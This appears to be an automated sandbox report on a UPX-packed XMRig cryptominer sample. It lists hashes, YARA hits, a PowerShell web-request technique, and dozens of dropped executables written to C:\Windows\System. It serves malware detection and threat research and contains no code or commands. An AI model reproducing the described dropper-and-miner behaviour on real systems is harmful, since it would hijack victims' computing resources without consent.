xmrig | 7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2

Analysis

max time kernel
150s
max time network
144s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
29/06/2024, 22:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
Size

1.8MB
MD5

5a75711389bb58329c06e22d8beeab43
SHA1

20502828bdcb059a4e7f8fffc84258bf5811ab89
SHA256

7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2
SHA512

64589781424c749901316409c57f9c1f4019c36381dbcd1698fc0a32a5e40301cf35b12f997cf63a53a4b623285205dcc1a8789fb77885a620afda1cd34081cc
SSDEEP

49152:Lz071uv4BPMkHC0IlnASEx/z+cl8WNG/Wof:NABI

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 20 IoCs

resource	yara_rule
behavioral1/memory/2920-45-0x000000013F040000-0x000000013F432000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2060-46-0x000000013FDF0000-0x00000001401E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2892-63-0x000000013F320000-0x000000013F712000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2612-60-0x000000013F910000-0x000000013FD02000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2504-58-0x000000013F360000-0x000000013F752000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2532-56-0x000000013F3B0000-0x000000013F7A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2776-53-0x000000013FB40000-0x000000013FF32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2592-50-0x000000013FBE0000-0x000000013FFD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2464-532-0x000000013F880000-0x000000013FC72000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2372-5416-0x000000013FCE0000-0x00000001400D2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2776-5417-0x000000013FB40000-0x000000013FF32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2484-5418-0x000000013F780000-0x000000013FB72000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2592-5424-0x000000013FBE0000-0x000000013FFD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2060-5423-0x000000013FDF0000-0x00000001401E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2612-5422-0x000000013F910000-0x000000013FD02000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2532-5421-0x000000013F3B0000-0x000000013F7A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2920-5420-0x000000013F040000-0x000000013F432000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1628-5437-0x000000013F6E0000-0x000000013FAD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2892-5491-0x000000013F320000-0x000000013F712000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2504-5492-0x000000013F360000-0x000000013F752000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 58 IoCs

resource	yara_rule
behavioral1/memory/2464-0-0x000000013F880000-0x000000013FC72000-memory.dmp	UPX
behavioral1/files/0x000d000000012336-7.dat	UPX
behavioral1/files/0x0035000000014171-15.dat	UPX
behavioral1/files/0x0016000000005586-19.dat	UPX
behavioral1/files/0x0008000000014367-23.dat	UPX
behavioral1/files/0x00070000000143fb-27.dat	UPX
behavioral1/files/0x0007000000014457-30.dat	UPX
behavioral1/files/0x00070000000144e9-35.dat	UPX
behavioral1/files/0x000800000001507a-36.dat	UPX
behavioral1/memory/2920-45-0x000000013F040000-0x000000013F432000-memory.dmp	UPX
behavioral1/memory/2060-46-0x000000013FDF0000-0x00000001401E2000-memory.dmp	UPX
behavioral1/files/0x0006000000015083-67.dat	UPX
behavioral1/memory/2892-63-0x000000013F320000-0x000000013F712000-memory.dmp	UPX
behavioral1/memory/2612-60-0x000000013F910000-0x000000013FD02000-memory.dmp	UPX
behavioral1/memory/1628-74-0x000000013F6E0000-0x000000013FAD2000-memory.dmp	UPX
behavioral1/memory/2372-77-0x000000013FCE0000-0x00000001400D2000-memory.dmp	UPX
behavioral1/memory/2484-106-0x000000013F780000-0x000000013FB72000-memory.dmp	UPX
behavioral1/files/0x0006000000015c9a-120.dat	UPX
behavioral1/files/0x0006000000015cb1-133.dat	UPX
behavioral1/files/0x0006000000015cee-149.dat	UPX
behavioral1/files/0x0006000000015d0a-161.dat	UPX
behavioral1/files/0x0006000000015d39-168.dat	UPX
behavioral1/files/0x0006000000015d9c-189.dat	UPX
behavioral1/files/0x0006000000015d61-177.dat	UPX
behavioral1/files/0x0006000000015ce3-164.dat	UPX
behavioral1/files/0x0006000000015ca8-130.dat	UPX
behavioral1/files/0x0006000000015b85-128.dat	UPX
behavioral1/files/0x0006000000015ae3-125.dat	UPX
behavioral1/files/0x0006000000015cd2-145.dat	UPX
behavioral1/files/0x0006000000015662-123.dat	UPX
behavioral1/files/0x00060000000153ee-107.dat	UPX
behavioral1/files/0x0006000000015b50-105.dat	UPX
behavioral1/files/0x00060000000158d9-104.dat	UPX
behavioral1/files/0x000600000001565a-103.dat	UPX
behavioral1/files/0x00060000000150d9-80.dat	UPX
behavioral1/files/0x0035000000014183-76.dat	UPX
behavioral1/memory/2504-58-0x000000013F360000-0x000000013F752000-memory.dmp	UPX
behavioral1/memory/2532-56-0x000000013F3B0000-0x000000013F7A2000-memory.dmp	UPX
behavioral1/files/0x0006000000015cf8-185.dat	UPX
behavioral1/files/0x0006000000015d85-180.dat	UPX
behavioral1/files/0x0006000000015d59-172.dat	UPX
behavioral1/files/0x0006000000015cc5-140.dat	UPX
behavioral1/files/0x0006000000015d21-165.dat	UPX
behavioral1/memory/2776-53-0x000000013FB40000-0x000000013FF32000-memory.dmp	UPX
behavioral1/memory/2592-50-0x000000013FBE0000-0x000000013FFD2000-memory.dmp	UPX
behavioral1/files/0x0006000000015f23-191.dat	UPX
behavioral1/memory/2464-532-0x000000013F880000-0x000000013FC72000-memory.dmp	UPX
behavioral1/memory/2372-5416-0x000000013FCE0000-0x00000001400D2000-memory.dmp	UPX
behavioral1/memory/2776-5417-0x000000013FB40000-0x000000013FF32000-memory.dmp	UPX
behavioral1/memory/2484-5418-0x000000013F780000-0x000000013FB72000-memory.dmp	UPX
behavioral1/memory/2592-5424-0x000000013FBE0000-0x000000013FFD2000-memory.dmp	UPX
behavioral1/memory/2060-5423-0x000000013FDF0000-0x00000001401E2000-memory.dmp	UPX
behavioral1/memory/2612-5422-0x000000013F910000-0x000000013FD02000-memory.dmp	UPX
behavioral1/memory/2532-5421-0x000000013F3B0000-0x000000013F7A2000-memory.dmp	UPX
behavioral1/memory/2920-5420-0x000000013F040000-0x000000013F432000-memory.dmp	UPX
behavioral1/memory/1628-5437-0x000000013F6E0000-0x000000013FAD2000-memory.dmp	UPX
behavioral1/memory/2892-5491-0x000000013F320000-0x000000013F712000-memory.dmp	UPX
behavioral1/memory/2504-5492-0x000000013F360000-0x000000013F752000-memory.dmp	UPX

XMRig Miner payload 20 IoCs

miner

resource	yara_rule
behavioral1/memory/2920-45-0x000000013F040000-0x000000013F432000-memory.dmp	xmrig
behavioral1/memory/2060-46-0x000000013FDF0000-0x00000001401E2000-memory.dmp	xmrig
behavioral1/memory/2892-63-0x000000013F320000-0x000000013F712000-memory.dmp	xmrig
behavioral1/memory/2612-60-0x000000013F910000-0x000000013FD02000-memory.dmp	xmrig
behavioral1/memory/2504-58-0x000000013F360000-0x000000013F752000-memory.dmp	xmrig
behavioral1/memory/2532-56-0x000000013F3B0000-0x000000013F7A2000-memory.dmp	xmrig
behavioral1/memory/2776-53-0x000000013FB40000-0x000000013FF32000-memory.dmp	xmrig
behavioral1/memory/2592-50-0x000000013FBE0000-0x000000013FFD2000-memory.dmp	xmrig
behavioral1/memory/2464-532-0x000000013F880000-0x000000013FC72000-memory.dmp	xmrig
behavioral1/memory/2372-5416-0x000000013FCE0000-0x00000001400D2000-memory.dmp	xmrig
behavioral1/memory/2776-5417-0x000000013FB40000-0x000000013FF32000-memory.dmp	xmrig
behavioral1/memory/2484-5418-0x000000013F780000-0x000000013FB72000-memory.dmp	xmrig
behavioral1/memory/2592-5424-0x000000013FBE0000-0x000000013FFD2000-memory.dmp	xmrig
behavioral1/memory/2060-5423-0x000000013FDF0000-0x00000001401E2000-memory.dmp	xmrig
behavioral1/memory/2612-5422-0x000000013F910000-0x000000013FD02000-memory.dmp	xmrig
behavioral1/memory/2532-5421-0x000000013F3B0000-0x000000013F7A2000-memory.dmp	xmrig
behavioral1/memory/2920-5420-0x000000013F040000-0x000000013F432000-memory.dmp	xmrig
behavioral1/memory/1628-5437-0x000000013F6E0000-0x000000013FAD2000-memory.dmp	xmrig
behavioral1/memory/2892-5491-0x000000013F320000-0x000000013F712000-memory.dmp	xmrig
behavioral1/memory/2504-5492-0x000000013F360000-0x000000013F752000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2076	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2920	EaXBBVE.exe
2060	aWXqJXy.exe
2592	tzTKFuh.exe
2776	NHVklJA.exe
2532	iompald.exe
2504	BZPtGyh.exe
2612	fQnFVux.exe
2892	jmRacfm.exe
1628	lxUbLAf.exe
2372	LADnXlj.exe
2484	mLChslX.exe
1244	CykyveW.exe
1648	CjqCOeb.exe
2272	GUIQnQf.exe
2472	IIkkfru.exe
1572	cJLZetJ.exe
2728	xsEVRjj.exe
1904	wJoCCxG.exe
2340	MzdTcam.exe
2300	qjnJgRZ.exe
1268	GdqtkPM.exe
2480	yQlqDII.exe
2040	prkZMNS.exe
2092	ZHmQvQT.exe
672	timZIcm.exe
1716	HOhyaSX.exe
584	vhuEPhy.exe
2716	iTZyXPr.exe
2212	zqzEOyO.exe
452	osIJvkP.exe
3048	cHImErO.exe
2208	IsOHpyf.exe
756	OITUsMF.exe
992	pEgkCcu.exe
1780	WFaKuOu.exe
852	AurXmOe.exe
2880	czMQTwK.exe
2884	cBkEsFK.exe
2832	PNrPJhb.exe
2044	QClkpOa.exe
2760	OLJRwLi.exe
1264	ggSDOFo.exe
1596	NFTqNFl.exe
2572	psqGNbt.exe
980	KwXXZRW.exe
1548	XZCHTbA.exe
1104	wuYFbxe.exe
2008	AGuMbrL.exe
2852	yCLygwY.exe
848	rRgufhv.exe
2356	TlVPmXl.exe
1900	rgosrQy.exe
2476	zbhAtgs.exe
1220	eFrPsNN.exe
912	hQcvFfl.exe
1668	HmvPuqb.exe
1616	lkTQmTX.exe
1012	BsOykvl.exe
1032	psXnjZK.exe
2948	pJVfDXk.exe
1684	wquzgiN.exe
2936	gMgBGUk.exe
1560	bhBxPcY.exe
1304	TswAKPL.exe

Loads dropped DLL 64 IoCs

pid	Process
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
2464	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2464-0-0x000000013F880000-0x000000013FC72000-memory.dmp	upx
behavioral1/files/0x000d000000012336-7.dat	upx
behavioral1/files/0x0035000000014171-15.dat	upx
behavioral1/files/0x0016000000005586-19.dat	upx
behavioral1/files/0x0008000000014367-23.dat	upx
behavioral1/files/0x00070000000143fb-27.dat	upx
behavioral1/files/0x0007000000014457-30.dat	upx
behavioral1/files/0x00070000000144e9-35.dat	upx
behavioral1/files/0x000800000001507a-36.dat	upx
behavioral1/memory/2920-45-0x000000013F040000-0x000000013F432000-memory.dmp	upx
behavioral1/memory/2060-46-0x000000013FDF0000-0x00000001401E2000-memory.dmp	upx
behavioral1/files/0x0006000000015083-67.dat	upx
behavioral1/memory/2892-63-0x000000013F320000-0x000000013F712000-memory.dmp	upx
behavioral1/memory/2612-60-0x000000013F910000-0x000000013FD02000-memory.dmp	upx
behavioral1/memory/1628-74-0x000000013F6E0000-0x000000013FAD2000-memory.dmp	upx
behavioral1/memory/2372-77-0x000000013FCE0000-0x00000001400D2000-memory.dmp	upx
behavioral1/memory/2484-106-0x000000013F780000-0x000000013FB72000-memory.dmp	upx
behavioral1/files/0x0006000000015c9a-120.dat	upx
behavioral1/files/0x0006000000015cb1-133.dat	upx
behavioral1/files/0x0006000000015cee-149.dat	upx
behavioral1/files/0x0006000000015d0a-161.dat	upx
behavioral1/files/0x0006000000015d39-168.dat	upx
behavioral1/files/0x0006000000015d9c-189.dat	upx
behavioral1/files/0x0006000000015d61-177.dat	upx
behavioral1/files/0x0006000000015ce3-164.dat	upx
behavioral1/files/0x0006000000015ca8-130.dat	upx
behavioral1/files/0x0006000000015b85-128.dat	upx
behavioral1/files/0x0006000000015ae3-125.dat	upx
behavioral1/files/0x0006000000015cd2-145.dat	upx
behavioral1/files/0x0006000000015662-123.dat	upx
behavioral1/files/0x00060000000153ee-107.dat	upx
behavioral1/files/0x0006000000015b50-105.dat	upx
behavioral1/files/0x00060000000158d9-104.dat	upx
behavioral1/files/0x000600000001565a-103.dat	upx
behavioral1/files/0x00060000000150d9-80.dat	upx
behavioral1/files/0x0035000000014183-76.dat	upx
behavioral1/memory/2504-58-0x000000013F360000-0x000000013F752000-memory.dmp	upx
behavioral1/memory/2532-56-0x000000013F3B0000-0x000000013F7A2000-memory.dmp	upx
behavioral1/files/0x0006000000015cf8-185.dat	upx
behavioral1/files/0x0006000000015d85-180.dat	upx
behavioral1/files/0x0006000000015d59-172.dat	upx
behavioral1/files/0x0006000000015cc5-140.dat	upx
behavioral1/files/0x0006000000015d21-165.dat	upx
behavioral1/memory/2776-53-0x000000013FB40000-0x000000013FF32000-memory.dmp	upx
behavioral1/memory/2592-50-0x000000013FBE0000-0x000000013FFD2000-memory.dmp	upx
behavioral1/files/0x0006000000015f23-191.dat	upx
behavioral1/memory/2464-532-0x000000013F880000-0x000000013FC72000-memory.dmp	upx
behavioral1/memory/2372-5416-0x000000013FCE0000-0x00000001400D2000-memory.dmp	upx
behavioral1/memory/2776-5417-0x000000013FB40000-0x000000013FF32000-memory.dmp	upx
behavioral1/memory/2484-5418-0x000000013F780000-0x000000013FB72000-memory.dmp	upx
behavioral1/memory/2592-5424-0x000000013FBE0000-0x000000013FFD2000-memory.dmp	upx
behavioral1/memory/2060-5423-0x000000013FDF0000-0x00000001401E2000-memory.dmp	upx
behavioral1/memory/2612-5422-0x000000013F910000-0x000000013FD02000-memory.dmp	upx
behavioral1/memory/2532-5421-0x000000013F3B0000-0x000000013F7A2000-memory.dmp	upx
behavioral1/memory/2920-5420-0x000000013F040000-0x000000013F432000-memory.dmp	upx
behavioral1/memory/1628-5437-0x000000013F6E0000-0x000000013FAD2000-memory.dmp	upx
behavioral1/memory/2892-5491-0x000000013F320000-0x000000013F712000-memory.dmp	upx
behavioral1/memory/2504-5492-0x000000013F360000-0x000000013F752000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\izEPYpV.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\QEQVgft.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\cbvwFPf.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\hZwBiDk.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\QggAXdE.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\IOliQhd.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\UZHyBHF.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\UaRdTHg.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\zFEnoff.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\ubwoPyu.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\WpHQnMz.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\RzbwgfJ.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\WztnIyf.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\DUOtOVm.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\KbFpIcb.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\pNHHAMy.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\hZLrUZQ.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\ZSmsbop.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\mbMdGUO.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\XwkslgL.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\jdMXNtT.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\YeSJRpp.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\zVAPMgL.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\yKZZswj.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\TrVDmXw.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\rAdtKvJ.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\GSUDUYp.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\rkZgqZY.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\hJuBYuE.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\QsEfcrs.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\NgHidyR.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\dcdDwwz.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\fsquWKg.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\dMtaSkU.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\xsEVRjj.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\TDLimes.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\DyIMDty.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\LyrhrKO.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\ZecgEkk.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\NHVklJA.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\EoEmhYU.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\xPllvqA.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\NTzrYKC.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\nxnbYRT.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\kRYcOkX.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\dfucsXW.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\cIwHWiX.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\uFhXPqb.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
File created	C:\Windows\System\VVlxaFb.exe	7649a91f8064f1cdd4300cfed25acf4a3c38edd76b454ca68cdb4f67c6ed98e2.exe
